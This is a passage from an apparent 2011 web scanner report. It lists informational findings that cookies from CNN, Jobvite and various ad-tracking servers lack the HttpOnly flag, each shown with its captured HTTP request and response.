Set-Cookie: impressions="{\"769846\": [1312767370+ \"dffe82cd-ff8c-4145-a734-bdd8d42b5cc7\"+ 69905+ 29809+ 1365]+ \"748419\": [1312767414+ \"c293e3f7-1374-398b-ad44-93d92a9ce4be\"+ 219708+ 61959+ 12050]+ \"728928\": [1313432713+ \"69816DAB-3F85-46AF-8D01-3B5FF6A6F956\"+ 70251+ 29836+ 1209]+ \"718819\": [1313102115+ \"08dcd5d0-76e4-4739-88e9-ffac3e204fc4\"+ 69900+ 29809+ 1365]+ \"799461\": [1313426618+ \"98F18B32-A1BA-4442-B3D4-AC0B1190E029\"+ 69861+ 29806+ 1209]+ \"728904\": [1313432778+ \"9438D1EC-137A-41B9-A85A-FC3DB1591307\"+ 70251+ 29836+ 1209]}"; Domain=invitemedia.com; expires=Tue, 14-Aug-2012 18:26:18 GMT; Path=/
Set-Cookie: camp_freq_p1="eJzjkuG4dJdZgFni1Mmln1gUGDXaTgFpA2aL3plAmkuC48w6FgEmiU6wLIMGgwGTxXqwjAzH6wlsAowSu2ZC9O26vx6oj9ECzOcS4Vh1HCS7eNNEqD4GCwagaNcrkOi2338+Iot2N7MD7ehCFgUAlyAwig=="; Domain=invitemedia.com; expires=Tue, 14-Aug-2012 18:26:18 GMT; Path=/
Set-Cookie: io_freq_p1="eJzjEufY4yLAKnHq5NJPLAoMGgwGrBa9M4FsLnGOSfECjBK7ZsIkGC3AbC5hjqnJAswSizdNhEowWDAABSenAVVv+/3nI1wQAPZnGjg="; Domain=invitemedia.com; expires=Tue, 14-Aug-2012 18:26:18 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

8.30. http://gdyn.cnn.com/1.1/1.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gdyn.cnn.com
Path:   /1.1/1.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1.1/1.gif?1313433963987 HTTP/1.1
Host: gdyn.cnn.com
Proxy-Connection: keep-alive
Referer: http://www.cnn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:08 GMT
Server: Apache
X-Netacuity: success
Set-Cookie: adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; expires=Mon, 22 Aug 2011 21:45:08 GMT; domain=.cnn.com; path=/
Set-Cookie: adDEon=true; expires=Mon, 22 Aug 2011 21:45:08 GMT; domain=.cnn.com; path=/
Last-Modified: Wed, 01 Dec 2004 19:27:52 GMT
ETag: "d0a8dd-2b-e6d33e00"
Accept-Ranges: bytes
Content-Length: 43
Cache-Control: max-age=60, private
Expires: Mon, 15 Aug 2011 18:46:08 GMT
P3P: CP="NOI DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI COM NAV STA"
Content-Type: image/gif

GIF89a.............!.......,...........D..;

8.31. http://hire.jobvite.com/CompanyJobs/Careers.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hire.jobvite.com
Path:   /CompanyJobs/Careers.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh HTTP/1.1
Host: hire.jobvite.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/news?o=0&l=dir&qsrc=168&q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: http-cookie-8hr=R3814240431; path=/; expires=Tue, 16-Aug-2011 02:30:44 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 15 Aug 2011 18:28:03 GMT
Content-Length: 51311

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<link href="careers_1.css"
...[SNIP]...

8.32. http://hire.jobvite.com/CompanyJobs/careers_1.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hire.jobvite.com
Path:   /CompanyJobs/careers_1.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /CompanyJobs/careers_1.css HTTP/1.1
Host: hire.jobvite.com
Proxy-Connection: keep-alive
Referer: http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: http-cookie-8hr=R3814240431

Response

HTTP/1.1 200 OK
Set-Cookie: http-cookie-8hr=R3814240431; path=/; expires=Tue, 16-Aug-2011 02:30:44 GMT
Cache-Control: private,max-age=604800
Content-Type: text/css
Last-Modified: Tue, 20 Jul 2010 18:29:18 GMT
Accept-Ranges: bytes
ETag: "0d3b4763928cb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 15 Aug 2011 18:28:04 GMT
Content-Length: 1874

....jvdlgtext
{
   font-family: Trebuchet MS, Trebuchet, Verdana, Arial, Helvetica, sans-serif;
   font-size: 12px;
}
.jvdlgborder1
{
   border: solid 2px White;
   background-color: White;
}
.jvdlg
...[SNIP]...

8.33. http://hire.jobvite.com/CompanyJobs/careers_8.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hire.jobvite.com
Path:   /CompanyJobs/careers_8.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /CompanyJobs/careers_8.js?v=128 HTTP/1.1
Host: hire.jobvite.com
Proxy-Connection: keep-alive
Referer: http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: http-cookie-8hr=R3814240431

Response

HTTP/1.1 200 OK
Set-Cookie: http-cookie-8hr=R3814240431; path=/; expires=Tue, 16-Aug-2011 02:30:44 GMT
Cache-Control: private,max-age=604800
Content-Type: application/x-javascript
Last-Modified: Sat, 06 Aug 2011 00:52:28 GMT
Accept-Ranges: bytes
ETag: "02e331dd353cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 15 Aug 2011 18:28:07 GMT
Content-Length: 84419

.../*
* COPYRIGHT 2011 Jobvite, Inc. All rights reserved. This copyright notice is Copyright Management
* Information under 17 USC 1202 and is included to protect this work and deter copyright infr
...[SNIP]...

8.34. http://i.w55c.net/ping_match.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i.w55c.net
Path:   /ping_match.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ping_match.gif?ei=PUBMATIC&rurl=http%3A//image2.pubmatic.com/AdServer/Pug%3Fvcode%3Dbz0yJnR5cGU9MSZjb2RlPTU3MSZ0bD0xNTc2ODAw%26piggybackCookie%3Duid%3A_wfivefivec_ HTTP/1.1
Host: i.w55c.net
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=25273&s=25281
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchdatran=1; matchtargus=1; wfivefivec=8413bde9-2099-43af-b214-8fee85ef2861; matchbluekai=1; matchgoogle=1

Response

HTTP/1.1 302 Found
Date: Mon, 15 Aug 2011 18:26:18 GMT
Server: Jetty(6.1.22)
Set-Cookie: wfivefivec=8413bde9-2099-43af-b214-8fee85ef2861;Path=/;Domain=.w55c.net;Expires=Wed, 14-Aug-13 18:26:18 GMT
X-Version: DataXu Pixel Tracker v3
Cache-Control: private
Content-Length: 0
Location: http://image2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTU3MSZ0bD0xNTc2ODAw&piggybackCookie=uid:8413bde9-2099-43af-b214-8fee85ef2861
Via: 1.1 dfw175164010000 (MII-APC/2.0)
Content-Type: text/plain


8.35. http://idpix.media6degrees.com/orbserv/hbpix

Summary

Severity:   Information
Confidence:   Certain
Host:   http://idpix.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbpix?pixId=3715 HTTP/1.1
Host: idpix.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=25273&s=25281
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lpcr330zijasq5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrfdfbsgynlre.pbz0; orblb=2lpscpz022ng10u01021mc27e10w0100000; vstcnt=41aj010r02458kv231p20420820pw30520820923sti11hj1042; clid=2lpcr3301171sbvs30c072oq0hnal00b68020x0980b; sglst=2040s0tolpl5u5098jj00968020x09809ag2lpuecb0001d00268020x028025colpscpz021np00368020x03803c1zlpuecb0001d00268020x02802; rdrlst=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; acs=014020e0f0h1lpcr33xzt1flkuxzt18er2xzt1hnal

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: orblb=2lpscpz022ng10u01021mc27e10w0100000; Domain=media6degrees.com; Expires=Sat, 11-Feb-2012 18:26:16 GMT; Path=/
Set-Cookie: vstcnt=41aj010r02458kv231p20420820pw30520820923sti11hj1042; Domain=media6degrees.com; Expires=Sat, 11-Feb-2012 18:26:16 GMT; Path=/
Set-Cookie: clid=2lpcr3301171sbvs30c072oq0mo4p00d6b020y0280d; Domain=media6degrees.com; Expires=Sat, 11-Feb-2012 18:26:16 GMT; Path=/
Set-Cookie: sglst=2040s0tolpl5u50e9dn00b6b020y0280bag2lpuecb050vh0046b020y028045colpscpz072ht0056b020y02805c1zlpuecb050vh0046b020y02804; Domain=media6degrees.com; Expires=Sat, 11-Feb-2012 18:26:16 GMT; Path=/
Set-Cookie: rdrlst=40n0g91lpuecb000000046b021196lpuecb000000046b0213j3lpl5w5000000096b021195lpuecb000000046b020camlpuecb000000046b020cjrlpuecb000000046b021194lpuecb000000046b0200cclpuecb000000046b0212pulpuecb000000046b0210rdlpuecb000000046b020znmlpmzu3000000076b021193lpuecb000000046b021ad8lpuecb000000046b021192lpuecb000000046b0210tylpuecb000000046b02196mlpmmkk000000086b020rbglpuecb000000046b0215xylpl5u50000000b6b0210polpl5vm0000000a6b0212qnlpuecb000000046b0210telpuecb000000046b020ciclpuecb000000046b020g8tlpscpz000000056b02; Domain=media6degrees.com; Expires=Sat, 11-Feb-2012 18:26:16 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 15 Aug 2011 18:26:15 GMT
Connection: close

GIF89a.............!.......,...........D..;

8.36. http://image2.pubmatic.com/AdServer/Pug

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTc2JnRsPTQzMjAw&piggybackCookie=uid:3574436734868397339 HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=25273&s=25281
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_53=424-7a4bd699-aa86-4e32-8a1e-afa2b5ba13a0; KRTBCOOKIE_100=4065-v3y4gkoh99wrv; KRTBCOOKIE_133=1873-1sbvs30c072oq; KRTBCOOKIE_22=488-pcv:1|uid:3041410246858069995; KRTBCOOKIE_97=3385-uid:be7b476b-57fa-4267-a79e-a26d510d1377; KRTBCOOKIE_57=476-uid:3539656946931560696; KADUSERCOOKIE=125ABA9D-0FE2-43BB-ADE5-0E1A290F0CAF; pubtime_28134=TMC; KRTBCOOKIE_80=1336-1e4cb365-db7a-4e61-9b94-c144934e6ac1.10263.50185.199.34377.57407.; pubtime_25281=TMC; KRTBCOOKIE_58=1344-CM-00000001429329761; KRTBCOOKIE_27=1216-uid:4e394114-5150-5bce-73fa-628197421391; KRTBCOOKIE_107=1471-uid:8413bde9-2099-43af-b214-8fee85ef2861; PUBRETARGET=70_1314908322.2114_1327977180.1039_1315359433.82_1407443773.1928_1315859937.78_1408029196.390_1321202620.1588_1316024657.362_1316024694.571_1408040699; _curtime=1313432705; pubfreq_25281=243-1; pubfreq_28134=243-1; PUBMDCID=1; pubfreq_25281_19972_333766901=661-1; PMDTSHR=cat:; SYNCUPPIX_ON=YES; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:41:28 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: KRTBCOOKIE_16=226-uid:3574436734868397339; domain=pubmatic.com; expires=Wed, 14-Aug-2013 18:41:28 GMT; path=/
Set-Cookie: PUBRETARGET=70_1314908322.2114_1327977180.1039_1315359433.82_1407443773.1928_1315859937.78_1408029196.390_1321202620.1588_1316024657.362_1316024694.571_1408040699.76_1316025688; domain=pubmatic.com; expires=Thu, 14-Aug-2014 18:24:59 GMT; path=/
Content-Length: 42
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D.;

8.37. http://image2.pubmatic.com/AdServer/Pug

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTM2MiZ0bD00MzIwMA==&piggybackCookie=uid:4e394114-5150-5bce-73fa-628197421391 HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=25273&s=25281
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_53=424-7a4bd699-aa86-4e32-8a1e-afa2b5ba13a0; KRTBCOOKIE_100=4065-v3y4gkoh99wrv; KRTBCOOKIE_133=1873-1sbvs30c072oq; KRTBCOOKIE_22=488-pcv:1|uid:3041410246858069995; KRTBCOOKIE_97=3385-uid:be7b476b-57fa-4267-a79e-a26d510d1377; KRTBCOOKIE_57=476-uid:3539656946931560696; KADUSERCOOKIE=125ABA9D-0FE2-43BB-ADE5-0E1A290F0CAF; pubfreq_28134=; pubtime_28134=TMC; KRTBCOOKIE_80=1336-1e4cb365-db7a-4e61-9b94-c144934e6ac1.10263.50185.199.34377.57407.; PUBRETARGET=70_1314908322.2114_1327977180.1039_1315359433.82_1407443773.1928_1315859937.78_1408029196.390_1321202620.1588_1316024657; PUBMDCID=1; pubfreq_25281=; pubtime_25281=TMC; _curtime=1313432692; pubfreq_25281_19972_345442688=243-1; PMDTSHR=cat:; SYNCUPPIX_ON=YES; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:24:54 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: KRTBCOOKIE_27=1216-uid:4e394114-5150-5bce-73fa-628197421391; domain=pubmatic.com; expires=Wed, 14-Aug-2013 18:24:54 GMT; path=/
Set-Cookie: PUBRETARGET=70_1314908322.2114_1327977180.1039_1315359433.82_1407443773.1928_1315859937.78_1408029196.390_1321202620.1588_1316024657.362_1316024694; domain=pubmatic.com; expires=Thu, 14-Aug-2014 15:13:16 GMT; path=/
Content-Length: 42
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D.;

8.38. http://js.revsci.net/gateway/gw.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/gw.js?csid=H07710 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=4bf7bb16cf9412c18b8815136d91a59c; NETSEGS_K05540=0a29f867077d7a4f&K05540&0&4e60db91&0&&4e3b97f9&eb0686832faccc361b6bf55e98e31ad5; udm_0=MLvv8iEJPj5npx6Bo8hY2L+1+kUjsrb3zCNeeLLD9My28XeHWAmn+9uUiLtJmK0Xf/l0O0X/1QEXLQALTg9EEFT6+LvS0M0lXglFWO58f0sfMpXzDxm+S1IZqOX1U27zHDsQW85DfkLDElQZxiHk4o/4bgBacphh6513iafXO0+djO48elokzpJEwV5p+VM10YTolQIdeL+PqwoN8MZoWogMtiF4P7nOuBORNXOsEBri4O2QxDrbbsjVF6gtLc4gzm9xZHIDy/5o0mrgHflrz9L8NaQJ4pud30h65IFxZktB8T/cL3blfVZCo4zCeHwhtw8o6ke3DX1rT5v1/vZLOePywRbs0Is9YP2k//uOqA2ekuS5StfAEgkTDys/Le/wxKKupbStXd9CiIDA8mj/W2sAl+xffMJtSZ3hkNYEyWe1hCmFxLHMtn+k48ida8E/Fp5sKtJm3wMuZ8LtP/FcpQHMgHKrrjXNCaYIydhGgPmHgyI4U0uKz9He6dCPtBC5h3yc4Lqg1ID+fNKAPWC9W141XK70cpkqVKwYLOFL+yU4GITEv43m/rvhy7mVcwCxfb8Astde+mbqQ5zkJJImBbsxcaAIRVAGor/txCaGoqqROl47NOD+gvwA0LXTifL+54l7gbstyQKGqCF90Iifqi2ndawl2G8AN3IFEd84cvPFrzUi99su/ymcPLS6aGnzrsd10bSd9ebjYqlQSWj9Ns9mBrYH7MqXsYvJXK6G8pSv1oRZ2lPNiSoQ1h0JTTeR3B01HAnlPID6Ig5zd6s7JKubRt/2w7Nb6kX1pcAeFjpk+0iL7szQ4Zd/JuPVOFvnq4SC77ziTWNMXwRPQLuOtEOCfCZzUf9BTkpfuM2fh/mWqRIvXTpxN+Lnw+xMbncDk3jQACrA; rsiPus_Mq_O="MLtPrM93sF9/IDFKT1Ygcyo+R7jFHbJwml9GW5geBHPr+wUITnpse6B5lWFJNAXVCUA2z+7FWZhAQVd6dFXIMjlKZdfb+YKvHMG9lK6M/tj+sUrbdzOSXNiidYeVFSXJGWrqvB4arfK8FH2r+PQoSgVZUPXYsJ2/PWutIm37r0LU6nMnOm2SQDpMvF3l"; rsi_us_1000000="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"; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqolNtLYIVF5M27L8vfsI7WByyXJ6gBlNTNwT8g7lTtVTtlUQIhMYnhGBxqxPi16ATScNUThNteKFr5insIjhhJfnz5/4MOhd/n6wiinE7/s0pX+4B2zcJ7hc=; rtc_GS70=MLuBa44HgVlDFVRDdcKRB3R3EIDZKgaJBK6woh4rAtJmVgX80yTcxtVUvX+wZdfT3z9ZvCMjShpnZzliZicNbn0rTj3r40ki4zC8bshHCjemRQboH1Al2GjhyihsVmLmviEIBiwmfPx4G76pEjpFI99ARJ8f4YFvwAdZJA==; NETSEGS_A09801=0a29f867077d7a4f&A09801&0&4e6e5333&0&&4e489fec&eb0686832faccc361b6bf55e98e31ad5

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=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; Domain=.revsci.net; Expires=Tue, 14-Aug-2012 18:45:33 GMT; Path=/
Last-Modified: Mon, 15 Aug 2011 18:45:33 GMT
Cache-Control: max-age=3600, private
Expires: Mon, 15 Aug 2011 19:45:33 GMT
X-Proc-ms: 1
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:45:32 GMT
Content-Length: 6200

//AG-develop 12.7.1-66 (2011-07-20 15:58:55 UTC)
var rsi_now= new Date();
var rsi_csid= 'H07710';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da)
...[SNIP]...

8.39. http://markets.money.cnn.com/services/api/quotehover/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://markets.money.cnn.com
Path:   /services/api/quotehover/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /services/api/quotehover/?callback=tickerCallback&symb=NOK HTTP/1.1
Host: markets.money.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __unam=7549672-131cec47d99-1e28128-1; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 15 Aug 2011 18:46:04 GMT
Content-Type: text/javascript; Charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
Cache-Control: private
Expires: Mon, 15 Aug 2011 18:45:04 GMT
X-Powered-By: ASP.NET
P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND"
Set-Cookie: 2536%5F0=858FAD2AF56391E69137A9A30BAE1DB1; path=/
Set-Cookie: WSOD%5FxrefSymbol=NOK; expires=Tue, 16-Aug-2011 04:00:00 GMT; domain=cnn.com; path=/
Set-Cookie: WSOD%5FcompetitorChecks=; expires=Sat, 18-Aug-2001 04:00:00 GMT; domain=cnn.com; path=/
Set-Cookie: WSOD%5FcompareToSP500=0; expires=Tue, 16-Aug-2011 04:00:00 GMT; domain=cnn.com; path=/
Set-Cookie: WSOD%5FcompareToCategory=0; expires=Tue, 16-Aug-2011 04:00:00 GMT; domain=cnn.com; path=/
Content-Length: 765

tickerCallback({"Api":{"keys":{"outputFormat":"JSONP","generatedTime":"2:46pm ET, 08/15/2011","generatedTimeUTC":"1313433964000"},"dataType":"Stock","ticker":"NOK","exchange":"NYSE","companyName":"Nok
...[SNIP]...

8.40. http://medleyads.com/mad_history

Summary

Severity:   Information
Confidence:   Certain
Host:   http://medleyads.com
Path:   /mad_history

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mad_history?adgroups=3466 HTTP/1.1
Host: medleyads.com
Proxy-Connection: keep-alive
Referer: http://medleyads.com/spot/5232.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s5023=14252=1; group_history=2752=1; s1082=6308=2; s5022=9994=1; s5232=24810=1; __utma=251326874.488407081.1313434615.1313434615.1313434615.1; __utmb=251326874.0.10.1313434615; __utmc=251326874; __utmz=251326874.1313434615.1.1.utmcsr=xhamster.com|utmccn=(referral)|utmcmd=referral|utmcct=/

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 19:05:50 GMT
Server: Apache/2.2.3 (CentOS) mod_apreq2-20051231/2.6.1 mod_perl/2.0.4 Perl/v5.8.8
Set-Cookie: __utmb=251326874.0.10.1313434615; path=/; domain=.medleyads.com; expires=Tue, 14-Aug-2012 19:05:50 GMT
Set-Cookie: s1082=6308=2; path=/; domain=.medleyads.com; expires=Tue, 14-Aug-2012 19:05:50 GMT
Set-Cookie: __utmc=251326874; path=/; domain=.medleyads.com; expires=Tue, 14-Aug-2012 19:05:50 GMT
Set-Cookie: s5023=14252=1; path=/; domain=.medleyads.com; expires=Tue, 14-Aug-2012 19:05:50 GMT
Set-Cookie: __utmz=251326874.1313434615.1.1.utmcsr=xhamster.com|utmccn=(referral)|utmcmd=referral|utmcct=/; path=/; domain=.medleyads.com; expires=Tue, 14-Aug-2012 19:05:50 GMT
Set-Cookie: group_history=2752=1&3466=1; path=/; domain=.medleyads.com; expires=Tue, 14-Aug-2012 19:05:50 GMT
Set-Cookie: s5022=9994=1; path=/; domain=.medleyads.com; expires=Tue, 14-Aug-2012 19:05:50 GMT
Set-Cookie: s5232=70975=1&24810=1; path=/; domain=.medleyads.com; expires=Tue, 14-Aug-2012 19:05:50 GMT
Set-Cookie: __utma=251326874.488407081.1313434615.1313434615.1313434615.1; path=/; domain=.medleyads.com; expires=Tue, 14-Aug-2012 19:05:50 GMT
